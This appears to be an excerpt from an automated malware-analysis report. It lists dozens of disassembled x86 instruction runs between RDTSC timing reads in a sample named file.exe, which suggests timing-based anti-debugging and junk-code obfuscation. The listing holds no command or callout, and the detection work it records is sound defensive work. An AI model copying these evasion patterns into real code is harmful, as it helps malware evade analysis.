Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F30D second address: A9F311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F414 second address: A9F436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FAAAC4EBB26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAAC4EBB2Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F436 second address: A9F44B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007FAAAC4EC6A6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0694 second address: AA06AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAC4EBB32h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA2899 second address: AA28AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA68EA second address: AA6939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB38h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FAAAC4EBB43h 0x00000014 pushad 0x00000015 ja 00007FAAAC4EBB26h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6939 second address: AA6940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6C3C second address: AA6C64 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jne 00007FAAAC4EBB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FAAAC4EBB37h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6E15 second address: AA6E1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6F96 second address: AA6FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAAC4EBB2Bh 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FA9 second address: AA6FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FB4 second address: AA6FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAAAC4EBB26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FBE second address: AA6FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FC2 second address: AA6FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FCF second address: AA6FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FD3 second address: AA6FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6FD7 second address: AA6FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72B8 second address: AA72C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jg 00007FAAAC4EBB26h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72C5 second address: AA72CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72CD second address: AA72D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA744B second address: AA747C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B9h 0x00000009 pop edx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FAAAC4EC6ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA747C second address: AA7489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FAAAC4EBB26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA7489 second address: AA748D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA748D second address: AA7493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38B1F second address: A38B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38B25 second address: A38B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAAAC4EBB26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEF2D second address: AAEF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF2F5 second address: AAF30F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAAAC4EBB26h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAAC4EBB2Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF30F second address: AAF322 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAAC4EC6A6h 0x00000008 jnp 00007FAAAC4EC6A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF772 second address: AAF776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF8AB second address: AAF8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF8AF second address: AAF8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF8B7 second address: AAF8D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FAAAC4EC6AEh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB1392 second address: AB1399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB6B6B second address: AB6B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5662 second address: AB56AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAC4EBB33h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FAAAC4EBB2Eh 0x0000000f jl 00007FAAAC4EBB26h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAAAC4EBB39h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5B26 second address: AB5B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAAAC4EC6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5B30 second address: AB5B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5B36 second address: AB5B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5C6B second address: AB5C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5E07 second address: AB5E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5E0D second address: AB5E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5F86 second address: AB5FFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ACh 0x00000007 jmp 00007FAAAC4EC6AFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FAAAC4EC6AFh 0x00000013 pop esi 0x00000014 pushad 0x00000015 pushad 0x00000016 ja 00007FAAAC4EC6A6h 0x0000001c jp 00007FAAAC4EC6A6h 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007FAAAC4EC6B4h 0x00000029 jmp 00007FAAAC4EC6ADh 0x0000002e jmp 00007FAAAC4EC6AEh 0x00000033 jp 00007FAAAC4EC6A6h 0x00000039 popad 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5FFF second address: AB6003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB6003 second address: AB6009 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB69EC second address: AB69FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FAAAC4EBB2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB69FD second address: AB6A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B2h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EC6ACh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5259 second address: AB525D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A37063 second address: A37072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75239 second address: A7524E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB30h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7524E second address: A5B256 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FAAAC4EC6A8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov dh, 45h 0x00000026 lea eax, dword ptr [ebp+12479F6Fh] 0x0000002c mov ecx, dword ptr [ebp+122D2B41h] 0x00000032 push eax 0x00000033 jmp 00007FAAAC4EC6B4h 0x00000038 mov dword ptr [esp], eax 0x0000003b mov ch, B8h 0x0000003d call dword ptr [ebp+122D3352h] 0x00000043 push eax 0x00000044 jne 00007FAAAC4EC6B4h 0x0000004a push eax 0x0000004b push edx 0x0000004c jp 00007FAAAC4EC6A6h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75333 second address: A7534C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7534C second address: A7536A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAC4EC6B9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75998 second address: A759A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAAAC4EBB26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7A175 second address: A7A179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75C34 second address: A75CB8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAAC4EBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FAAAC4EBB31h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FAAAC4EBB28h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b or edx, 11C17B7Bh 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FAAAC4EBB28h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d push eax 0x0000004e jp 00007FAAAC4EBB3Bh 0x00000054 pushad 0x00000055 jmp 00007FAAAC4EBB2Dh 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76132 second address: A76147 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7626E second address: A76272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76272 second address: A7627C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAAC4EC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB2AD second address: ABB2D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FAAAC4EBB26h 0x00000009 jmp 00007FAAAC4EBB37h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB428 second address: ABB446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAC4EC6B9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB446 second address: ABB482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAAAC4EBB26h 0x0000000a jmp 00007FAAAC4EBB32h 0x0000000f popad 0x00000010 jne 00007FAAAC4EBB2Eh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FAAAC4EBB26h 0x00000021 jnp 00007FAAAC4EBB26h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB5D8 second address: ABB5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB5DE second address: ABB5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB5E2 second address: ABB5E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB5E6 second address: ABB606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAC4EBB2Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB606 second address: ABB616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ACh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABB616 second address: ABB62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAAC4EBB2Bh 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBA0F second address: ABBA15 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBA15 second address: ABBA4A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAAAC4EBB50h 0x00000008 jmp 00007FAAAC4EBB36h 0x0000000d jmp 00007FAAAC4EBB34h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBA4A second address: ABBA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c ja 00007FAAAC4EC6BBh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBA75 second address: ABBA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBA79 second address: ABBA7F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBCFF second address: ABBD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007FAAAC4EBB26h 0x0000000c jmp 00007FAAAC4EBB2Eh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAAC4EBB33h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABBD2F second address: ABBD45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABEDC5 second address: ABEDDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EBB33h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC1F16 second address: AC1F6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007FAAAC4EC6B7h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 jno 00007FAAAC4EC6ACh 0x0000001a push esi 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007FAAAC4EC6B8h 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC1F6F second address: AC1F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC1A7D second address: AC1A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6AAh 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC1A8E second address: AC1AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB35h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FAAAC4EBB39h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4FF5 second address: AC4FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4FF9 second address: AC4FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4B7A second address: AC4B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4B85 second address: AC4B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4B8B second address: AC4B91 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACCD24 second address: ACCD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACCD2E second address: ACCD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACCD37 second address: ACCD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75EF3 second address: A75F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75F03 second address: A75F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75F07 second address: A75F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EC6ABh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75F1D second address: A75F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
